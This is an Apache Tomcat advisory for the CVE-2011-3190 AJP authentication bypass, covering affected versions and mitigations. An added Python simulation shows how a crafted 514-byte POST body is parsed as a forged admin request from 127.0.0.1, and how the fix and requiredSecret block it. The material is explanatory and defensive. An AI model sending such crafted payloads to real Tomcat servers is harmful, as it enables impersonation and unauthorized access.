Serious security vulnerabilities in Apache Tomcat

Apache Tomcat has disclosed another security vulnerability: 

Vulnerability: CVE-2011-3190 Apache Tomcat authentication bypass and information disclosure 
Severity: Important 
Vendor: The Apache Software Foundation 
Affected versions: 

  • Tomcat 7.0.0 to 7.0.20
  • Tomcat 6.0.0 to 6.0.33
  • Tomcat 5.5.0 to 5.5.33
  • Earlier, unsupported versions may also be affected.
Apache Tomcat supports the AJP protocol, which reverse proxies use to pass requests, and the data associated with them, to Tomcat. The protocol is designed so that when a request includes a request body, an unsolicited AJP message carrying the first part (or possibly all) of that body is sent to Tomcat right after the request itself. In certain circumstances Tomcat did not process this message as a request body but as a new request. Because the body is supplied by the client, this gave an attacker full control over that AJP message and allowed the attacker to: 

  • inject the name of an authenticated user
  • inject the IP address of any client (which may bypass any filtering based on client IP address)
  • cause responses to be mixed up between users
The following AJP connector implementation is not affected: 

  • org.apache.jk.server.JkCoyoteHandler (5.5.x default, 6.0.x default)
The following AJP connector implementations are affected: 

  • org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x default)
  • org.apache.coyote.ajp.AjpNioProtocol (7.0.x)
  • org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x)
In addition, the issue only applies if both of the following are true: 

  • POST requests are accepted
  • The request body is not processed (for example, the servlet returns without reading it, so the body message is left unread on the AJP connection)
Example: see https://issues.apache.org/bugzilla/show_bug.cgi?id=51698 

Mitigation: users of affected versions should apply one of the following: 

  • Upgrade to a version of Apache Tomcat that includes a fix for this issue.
  • Apply the appropriate patch:
    - 7.0.x http://svn.apache.org/viewvc?rev=1162958&view=rev 
    - 6.0.x http://svn.apache.org/viewvc?rev=1162959&view=rev 
    - 5.5.x http://svn.apache.org/viewvc?rev=1162960&view=rev
  • Configure both the reverse proxy and the Tomcat AJP connector to use the requiredSecret attribute, so that a forwarded request that does not carry the shared secret is rejected.
  • Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not available for Tomcat 7.0.x).
Via apache.org 
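To make the mechanism and the mitigations concrete, here is an added example in Python (it is not code from the advisory, from Tomcat or from the Apache project) that models AJP13 framing: a forward-request packet, the unsolicited body packet that follows a POST, a container-side read loop, and the three outcomes above. The packet layout (magic 0x12 0x34, u16 length, prefix code, method, strings, headers, attribute list ending in 0xFF) follows the AJP13 protocol. The trick the example relies on is the example's own reasoning from that layout, not something the advisory spells out: a body packet's payload begins with a u16 data length, while a forward request begins with prefix byte 2 followed by a method code, so a body of exactly 0x0202 = 514 bytes reads as a GET forward request if the container never consumed it. The host names, addresses, secret value and `/admin/` path are constructed for the example, and the "drain the unread body packet" fix and the requiredSecret check are simplified models of the real connector's behaviour, not its code.

```python
import struct

MAGIC = b"\x12\x34"                # magic of every proxy -> container packet
FORWARD_REQUEST = 2                # prefix code of a forward-request packet
ARE_DONE = 0xFF                    # terminator of the attribute list
METHODS = {2: "GET", 4: "POST"}    # subset of the AJP13 method codes
ATTRS = {0x03: "remote_user", 0x04: "auth_type", 0x0C: "secret"}

def ajp_string(s):                 # AJP string: u16 length, bytes, NUL terminator
    b = s.encode()
    return struct.pack(">H", len(b)) + b + b"\x00"

def packet(payload):
    return MAGIC + struct.pack(">H", len(payload)) + payload

def forward_fields(uri, remote_addr, headers, attrs):
    """Everything in a forward request after the method byte (AJP13 layout)."""
    out = ajp_string("HTTP/1.1") + ajp_string(uri) + ajp_string(remote_addr)
    out += ajp_string("") + ajp_string("tomcat.example")   # remote_host, server_name (constructed)
    out += struct.pack(">H", 8080) + b"\x00"                 # server_port, is_ssl
    out += struct.pack(">H", len(headers))
    for name, value in headers.items():                      # toy proxy sends names as strings
        out += ajp_string(name) + ajp_string(value)
    for code, value in attrs:
        out += bytes([code]) + ajp_string(value)
    return out + bytes([ARE_DONE])

def body_packet(body):             # unsolicited first body chunk: u16 data length, then data
    return packet(struct.pack(">H", len(body)) + body)

class Reader:
    def __init__(self, data):
        self.data, self.pos = data, 0
    def byte(self):
        self.pos += 1
        return self.data[self.pos - 1]
    def u16(self):
        self.pos += 2
        return struct.unpack_from(">H", self.data, self.pos - 2)[0]
    def string(self):
        n = self.u16()
        self.pos += n + 1              # skip the bytes and the NUL
        return self.data[self.pos - n - 1:self.pos - 1].decode()
    def packet(self):                  # next AJP packet payload on the connection
        if self.data[self.pos:self.pos + 2] != MAGIC:
            raise ValueError("bad AJP magic")
        self.pos += 2
        n = self.u16()
        self.pos += n
        return self.data[self.pos - n:self.pos]

def parse_forward_request(payload):
    r = Reader(payload)
    if r.byte() != FORWARD_REQUEST:
        raise ValueError("not a forward request")
    method = METHODS.get(r.byte(), "?")
    protocol, uri, remote_addr, remote_host, server_name = (r.string() for _ in range(5))
    server_port, is_ssl = r.u16(), r.byte()
    headers, attrs = {}, {}
    for _ in range(r.u16()):
        name = r.string()
        headers[name] = r.string()
    while True:
        code = r.byte()
        if code == ARE_DONE:
            break
        attrs[ATTRS.get(code, code)] = r.string()
    return {"method": method, "uri": uri, "remote_addr": remote_addr,
            "headers": headers, "attrs": attrs}

def summary(req):
    return (req["method"], req["uri"], req["remote_addr"], req["attrs"].get("remote_user"))

def process_connection(wire, drain_unread_body, required_secret=None):
    """Container-side loop; the 'application' never reads the POST body."""
    r, result = Reader(wire), {"accepted": [], "rejected": []}
    while r.pos < len(wire):
        payload = r.packet()
        if payload[0] != FORWARD_REQUEST:
            continue                   # unexpected message type: skipped
        req = parse_forward_request(payload)
        if required_secret is not None and req["attrs"].get("secret") != required_secret:
            result["rejected"].append(summary(req))   # model of the 403 Tomcat returns here
            break
        result["accepted"].append(summary(req))
        if drain_unread_body and int(req["headers"].get("content-length", 0)) > 0:
            r.packet()                 # model of the fix: swallow the unread body packet
    return result

def smuggled_body(method_code=2):
    """Constructed attacker body of exactly 0x02<method> bytes, so the body packet's
    u16 data length doubles as [prefix=2][method]; padding after ARE_DONE is never parsed."""
    fields = forward_fields("/admin/", "127.0.0.1", {}, [(0x03, "admin"), (0x04, "BASIC")])
    return fields + b"\x00" * (((FORWARD_REQUEST << 8) | method_code) - len(fields))

def build_wire(secret=None):
    """What the proxy puts on the AJP connection for one attacker-sent POST (constructed)."""
    body = smuggled_body()
    attrs = [(0x0C, secret)] if secret else []
    legit = packet(bytes([FORWARD_REQUEST, 4]) + forward_fields(
        "/upload", "203.0.113.7", {"content-length": str(len(body))}, attrs))
    return legit + body_packet(body)
```

Run the three scenarios with `process_connection(build_wire(), drain_unread_body=False)`, the same call with `drain_unread_body=True`, and `process_connection(build_wire("s3cr3t"), False, "s3cr3t")`. The first accepts a second, forged GET /admin/ that claims to come from 127.0.0.1 as the authenticated user admin; the second sees only the real POST because the body packet was consumed before the next request was read; the third rejects the forged request because the attacker cannot put the shared secret into it. In a real deployment the secret is set with the requiredSecret attribute on Tomcat's AJP Connector and the matching value on the proxy side (for mod_jk, the worker's secret property); the example's check is a model of that, not Tomcat's implementation.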
